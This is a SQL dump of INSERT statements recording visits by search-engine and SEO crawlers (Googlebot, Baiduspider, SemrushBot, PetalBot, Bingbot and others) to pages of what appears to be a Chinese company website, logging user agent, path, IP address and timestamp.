INSERT INTO `ey_weapp_spider_visit` VALUES ('99013', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/278.html', '162.55.86.60', '1662457372', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99012', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/', '162.55.86.60', '1662457369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99021', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/336.html', '162.55.86.60', '1662457427', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99010', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/495.html', '162.55.86.60', '1662457351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99007', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/419.html', '162.55.86.60', '1662457339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99006', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/406.html', '162.55.86.60', '1662457336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99008', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/466.html', '162.55.86.60', '1662457345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99001', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/380.html', '162.55.86.60', '1662457321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98995', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/290.html', '162.55.86.60', '1662457302', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98994', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/289.html', '162.55.86.60', '1662457299', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98989', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/message/', '162.55.86.60', '1662457282', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98988', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jiaruwomen/', '162.55.86.60', '1662457279', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98984', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gqal/', '162.55.86.60', '1662457266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98986', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jbJxw/', '162.55.86.60', '1662457272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98987', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jbzxw/', '162.55.86.60', '1662457275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98981', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/contact/', '162.55.86.60', '1662457256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98990', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/', '162.55.86.60', '1662457285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98970', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bc/', '162.55.86.60', '1662457208', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98969', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/about/', '162.55.86.60', '1662457204', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98980', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/chukouquanqiu/', '162.55.86.60', '1662457253', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98965', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_69/', '66.249.79.112', '1662455347', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98967', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/', '162.55.86.60', '1662457201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98959', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_48.html', '185.191.171.40', '1662453152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98956', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/288.html', '216.244.66.194', '1662451547', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98958', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/contact', '116.179.32.214', '1662452320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98948', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/464.html', '114.119.151.155', '1662448399', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98950', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_4.html', '185.191.171.23', '1662450337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98944', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_17/', '185.191.171.7', '1662447619', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98933', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/427.html', '185.191.171.23', '1662443520', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98931', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1662443164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98921', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/389.html', '185.191.171.11', '1662432727', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98914', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662429890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98912', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_10.html', '185.191.171.25', '1662429384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98913', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1662429720', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94240', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/52_4.html', '66.249.79.108', '1660162055', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98906', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.110', '1662423044', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98907', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/454.html', '185.191.171.21', '1662425077', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98904', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/yqal/', '207.46.13.213', '1662420589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98935', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_8.html', '185.191.171.36', '1662444242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98934', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_44/', '185.191.171.45', '1662443844', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98901', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/', '220.181.108.90', '1662417958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98902', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_5.html', '185.191.171.34', '1662419108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94214', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/42.html', '185.191.171.37', '1660148605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98897', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/227.html', '185.191.171.1', '1662415744', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98892', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/473.html', '114.119.151.153', '1662415286', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98888', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/414.html', '114.119.151.155', '1662414212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98889', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/111.html', '114.119.151.155', '1662414640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94345', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1660216697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98883', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_5.html', '185.191.171.17', '1662412230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98890', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/list_2_5/', '114.119.151.155', '1662414961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98884', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/129.html', '116.179.32.210', '1662413047', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98876', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bcwd', '220.181.108.113', '1662403231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94362', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_47/', '185.191.171.4', '1660226226', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98872', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_30.html', '185.191.171.37', '1662399949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94363', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/294.html', '185.191.171.26', '1660228556', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94364', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/203.html', '216.244.66.194', '1660228697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94378', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660241836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94381', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/407.html', '185.191.171.26', '1660243561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94356', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1660221750', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94355', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gongsijianjie/', '185.191.171.4', '1660220981', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98865', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/22.html', '185.191.171.21', '1662392790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98864', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/60.html', '185.191.171.42', '1662391693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94382', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_26.html', '116.179.32.90', '1660245999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98861', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_2/', '185.191.171.14', '1662389358', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98862', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/492.html', '185.191.171.22', '1662390173', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98858', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/jiaruwomen/', '157.55.39.117', '1662388739', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98855', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/96.html', '220.181.108.144', '1662383594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98856', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/112.html', '185.191.171.17', '1662385742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98854', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/354.html', '185.191.171.21', '1662383539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94399', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.155', '1660259789', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94400', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/199.html', '207.46.13.215', '1660259926', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94403', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/185.html', '185.191.171.7', '1660260676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94395', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_2/', '216.244.66.194', '1660257325', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98849', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/368.html?admin_id=1', '116.179.32.201', '1662377478', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98848', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662375990', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94410', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/218.html', '216.244.66.194', '1660263033', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98846', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/61.html', '114.119.151.155', '1662375443', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94404', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tbxw/list_91_2/', '220.181.108.175', '1660260726', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94406', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/403.html', '185.191.171.8', '1660262019', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94413', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_23/', '185.191.171.18', '1660263700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94415', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_14/', '185.191.171.23', '1660265424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98842', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/362.html', '114.119.151.155', '1662372912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98840', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/heiheshi.html', '114.119.151.155', '1662371701', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98837', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/266.html', '66.249.79.108', '1662369866', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94417', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_47/', '185.191.171.21', '1660265644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98836', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen/', '66.249.79.112', '1662369162', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94418', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_19/', '185.191.171.23', '1660265902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94419', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/89.html', '185.191.171.1', '1660267560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94422', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_20/', '185.191.171.34', '1660270150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94423', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/465.html', '185.191.171.6', '1660270260', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94427', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660271654', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94431', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_5.html', '185.191.171.4', '1660274060', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94432', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bc/', '185.191.171.4', '1660274819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94435', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_9/', '116.179.32.198', '1660275455', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94436', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/366.html', '185.191.171.5', '1660275704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98826', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/206.html', '185.191.171.10', '1662364245', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98823', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/167.html', '220.181.108.155', '1662362599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98818', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bcxw', '116.179.32.198', '1662361356', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98886', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662413813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98834', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/313.html', '66.249.79.110', '1662367583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98817', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/liaoyuan.html', '114.119.151.153', '1662361316', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98819', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/412.html', '185.191.171.39', '1662361533', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94424', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_34/', '220.181.108.113', '1660270544', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98813', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_21.html', '185.191.171.2', '1662358096', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94441', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1660276989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98814', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yc.html', '114.119.151.153', '1662359975', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94342', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_32/', '220.181.108.146', '1660213499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98808', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.110', '1662357069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94445', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/113.html', '220.181.108.144', '1660280364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94333', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/25.html', '114.119.151.153', '1660208798', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94339', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.93', '1660212095', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98800', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/305.html', '66.249.79.110', '1662350365', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98799', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_34/', '185.191.171.43', '1662350147', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98793', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.169', '1662347309', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98789', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/428.html', '114.119.151.153', '1662346722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98791', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_8/', '114.119.151.155', '1662347084', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98794', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/243.html', '114.119.151.153', '1662347331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94443', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.108', '1660277524', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94442', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.110', '1660277522', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98779', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/491.html', '114.119.151.153', '1662342272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98778', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.110', '1662341437', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98780', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/378.html', '114.119.151.155', '1662342511', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98773', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/139.html', '220.181.108.159', '1662339360', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98801', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/313.html', '66.249.79.108', '1662351456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98771', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_10/', '114.119.151.153', '1662338018', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98803', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662351824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98770', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lfs.html', '114.119.151.155', '1662337152', '0');
